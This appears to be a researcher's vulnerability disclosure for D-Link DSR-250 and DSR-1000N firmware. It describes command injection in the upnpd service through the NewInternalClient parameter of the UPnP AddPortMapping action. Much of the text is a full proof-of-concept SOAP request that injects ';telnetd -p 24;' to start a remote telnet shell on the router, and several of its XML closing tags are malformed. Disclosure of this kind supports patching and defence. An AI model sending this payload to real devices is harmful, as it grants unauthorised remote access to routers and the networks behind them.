DSR-250 (3.14) DSR-1000N (2.11B201)
There is a upnpd program in the firmware package, which listens on port 1900(udp)and 49152(tcp) at 0.0.0.0.
Through reverse analysis, we find that when the program sets iptable, the parameters are not checked, which may cause command injection.
Parameters such as '_newInternalClient' can be controlled and finally assembled into the iptables command. Because the special symbol is not checked, it may cause command injection.
POST /upnp/control/WANIPConn1 HTTP/1.1
HOST: $control_host:$control_port
Content-Length: $content_length
Content-Type: text/xml; charset="utf-8"
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewExternalPort>7331</NewExternalPort>
<NewProtocol>tcp<NewProtocol/>
<NewInternalPort>1337<NewInternalPort/>
<NewLeaseDuration><NewLeaseDuration/>
<NewEnabled>1<NewEnabled/>
<NewPortMappingDescription>hackedByC0ss4ck<NewPortMappingDescription/>
<NewRemoteHost>0.0.0.0<NewRemoteHost/>
<NewInternalClient>;telnetd -p 24;<NewInternalClient/>
</u:AddPortMapping>
</s:Body>
</s:Envelope>
Swings @ Chaitin (email: weiming.shi@chaitin.com)
C0ss4c k@StarCross Tech